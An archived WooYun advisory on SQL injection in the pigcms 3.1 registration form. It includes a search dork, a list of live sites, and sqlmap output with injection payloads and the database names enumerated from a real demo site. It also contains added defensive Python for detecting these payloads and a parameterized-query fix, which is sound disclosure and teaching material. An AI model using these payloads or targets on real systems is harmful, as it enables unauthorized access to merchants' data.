WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-12-05: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2015-03-05: The vendor has actively ignored the vulnerability; details are now disclosed to the public.
pigcms 3.1: injection vulnerability in the user registration handler
WooYun: SQL injection in a widely deployed WeChat public-account platform (leaks information on more than ten thousand merchants)
Keyword: inurl:index.php?g=Home&m=Index&a=help
Related cases:
http://www.fifee.com/
http://lierk.cn/index.php?m=Index&a=login
http://a.t2.weixinbiz.cn/index.php?m=Index&a=reg
http://114.215.185.138/index.php?m=Users&a=checklogin
http://wechat.lx1999.com.cn/index.php?m=Users&a=checklogin
http://www.jpsbzr.com/index.php?m=Index&a=login
http://www.iweichat.com/index.php?m=Index&a=login
http://166u.cn/
http://wx.lefangw.cn/index.php?g=Home&m=Index&a=help
#1 Demo site: user registration
http://wechat.lx1999.com.cn/index.php?m=Index&a=login
Then capture the registration request: the username parameter is not filtered and is injectable; a single quote is passed straight into the query.
Here we simply hand the request to sqlmap.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: username=synack') RLIKE (SELECT (CASE WHEN (8978=8978) THEN 0x73796e61636b ELSE 0x28 END)) AND ('IRPc'='IRPc&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: username=synack') AND (SELECT 6837 FROM(SELECT COUNT(*),CONCAT(0x716f796471,(SELECT (CASE WHEN (6837=6837) THEN 1 ELSE 0 END)),0x7165736d71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BXpm'='BXpm&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: username=synack') AND SLEEP(5) AND ('CIZJ'='CIZJ&password=synack&repassword=synack&mp=13585001213&[email protected]&invitecode=&__hash__=3e9fde7441cc55bf46afe7f8361af205_55b6754b5cf7bfbacb68f0eda1ff0b9a
---
web application technology: Apache
back-end DBMS: MySQL 5.0
available databases [5]:
[*] information_schema
[*] mysql
[*] start
[*] weixine
[*] weixintest
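The three sqlmap techniques above (boolean-based RLIKE, error-based FLOOR(RAND(0)*2) against INFORMATION_SCHEMA, and time-based SLEEP) leave recognisable shapes in the POST body. The following is an added example, not code from the report or from pigcms, showing how a defender can triage registration requests for those shapes; the sample bodies are constructed here from the payloads quoted above plus one benign registration. Signature matching of this kind is a detection aid for logs or a WAF, not a substitute for parameterized queries.

```python
import re
from urllib.parse import parse_qs, urlencode

# Indicators derived from the payload shapes in the sqlmap output above.
INDICATORS = {
    "boolean_rlike": re.compile(r"\bRLIKE\b", re.I),
    "error_based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "schema_probe": re.compile(r"INFORMATION_SCHEMA\.", re.I),
    "time_based": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    # a closing quote+paren followed by a boolean operator: the value is
    # trying to re-shape the WHERE clause it was spliced into
    "quote_breakout": re.compile(r"'\)\s*(AND|OR|RLIKE)\b", re.I),
    "case_oracle": re.compile(r"CASE\s+WHEN\s*\(", re.I),
}

# Constructed sample requests (urlencode makes them look like what the
# server receives; parse_qs decodes them back).
SAMPLE_BODIES = [
    ("benign", urlencode({"username": "alice", "password": "s3cret", "mp": "13800000000"})),
    ("boolean", urlencode({"username": "synack') RLIKE (SELECT (CASE WHEN (8978=8978) "
                                       "THEN 0x73796e61636b ELSE 0x28 END)) AND ('IRPc'='IRPc",
                           "password": "synack"})),
    ("error", urlencode({"username": "synack') AND (SELECT 6837 FROM(SELECT COUNT(*),"
                                     "CONCAT(0x716f796471,(SELECT (CASE WHEN (6837=6837) THEN 1 "
                                     "ELSE 0 END)),0x7165736d71,FLOOR(RAND(0)*2))x FROM "
                                     "INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ('BXpm'='BXpm",
                         "password": "synack"})),
    ("time", urlencode({"username": "synack') AND SLEEP(5) AND ('CIZJ'='CIZJ",
                        "password": "synack"})),
]


def scan_form_body(body: str, params=("username",)) -> dict:
    """Return {param: [indicator names]} for each watched parameter of a
    urlencoded POST body whose value matches at least one indicator."""
    fields = parse_qs(body, keep_blank_values=True)
    hits = {}
    for name in params:
        for value in fields.get(name, []):
            matched = [k for k, rx in INDICATORS.items() if rx.search(value)]
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits


def triage(samples=SAMPLE_BODIES) -> dict:
    """Label each sample body with the sorted set of indicators it trips."""
    out = {}
    for label, body in samples:
        hits = scan_form_body(body)
        out[label] = sorted(set(hits.get("username", [])))
    return out


if __name__ == "__main__":
    for label, found in triage().items():
        print(f"{label:8s} -> {found or 'clean'}")
```

The benign registration trips nothing; each of the three sqlmap shapes trips the technique-specific indicator plus the generic quote_breakout, which is the one worth alerting on since it fires regardless of which DBMS function follows.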
Filter the username parameter.
Could not reach the vendor, or the vendor actively declined.
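The root cause described at the demo site (the username value is spliced into the SQL text, so a single quote and closing paren re-shape the clause) and the fix ("filter the username") are illustrated by the added example below. It is not pigcms code (which is PHP on MySQL): it uses Python's sqlite3 as a stand-in, with a constructed users table and a boolean-style probe in the same shape as the report's RLIKE payload but using CASE, since sqlite3 has no RLIKE. The point it shows is that binding the value as a parameter removes the oracle entirely, whereas ad-hoc filtering of quotes is easy to get wrong.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the users table (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT UNIQUE)")
    con.executemany("INSERT INTO users (username) VALUES (?)", [("alice",), ("bob",)])
    return con


def username_taken_unsafe(con: sqlite3.Connection, username: str) -> bool:
    # Vulnerable pattern: the request parameter becomes part of the SQL text,
    # so a value containing ') closes the literal and the paren and the rest
    # is parsed as SQL. Shown only to demonstrate the defect.
    sql = "SELECT COUNT(*) FROM users WHERE (username = '%s')" % username
    return con.execute(sql).fetchone()[0] > 0


def username_taken_safe(con: sqlite3.Connection, username: str) -> bool:
    # Fixed pattern: the value is bound as a parameter and reaches the engine
    # as an opaque string, whatever characters it contains.
    sql = "SELECT COUNT(*) FROM users WHERE (username = ?)"
    return con.execute(sql, (username,)).fetchone()[0] > 0


# Constructed boolean-blind probes shaped like the report's payload: a CASE
# expression (1 or 0) ANDed into the clause, then the quote/paren re-closed.
TRUE_PROBE = "alice') AND (CASE WHEN (8978=8978) THEN 1 ELSE 0 END) AND ('IRPc'='IRPc"
FALSE_PROBE = "alice') AND (CASE WHEN (8978=8979) THEN 1 ELSE 0 END) AND ('IRPc'='IRPc"


def oracle_difference(check) -> tuple:
    """Run the true and false probes through `check`. An injectable check
    answers (True, False), i.e. the condition leaks through the response;
    a parameterized check answers (False, False): no such username exists."""
    con = make_db()
    return check(con, TRUE_PROBE), check(con, FALSE_PROBE)


def apostrophe_check() -> tuple:
    """A legitimate name containing an apostrophe: the unsafe query raises a
    syntax error (the same class of error the error-based technique relies
    on), while the parameterized query simply answers False."""
    con = make_db()
    try:
        unsafe = username_taken_unsafe(con, "O'Brien")
    except sqlite3.OperationalError:
        unsafe = "error"
    return unsafe, username_taken_safe(con, "O'Brien")


if __name__ == "__main__":
    print("unsafe:", oracle_difference(username_taken_unsafe))   # (True, False)
    print("safe:  ", oracle_difference(username_taken_safe))     # (False, False)
    print("O'Brien:", apostrophe_check())                        # ('error', False)
```

In the pigcms case the same change applies to whichever query the registration handler runs with the submitted username (a duplicate-name check or the INSERT itself): pass the value through a bound parameter rather than concatenating it, and the quote-breakout that sqlmap found has nothing to break out of.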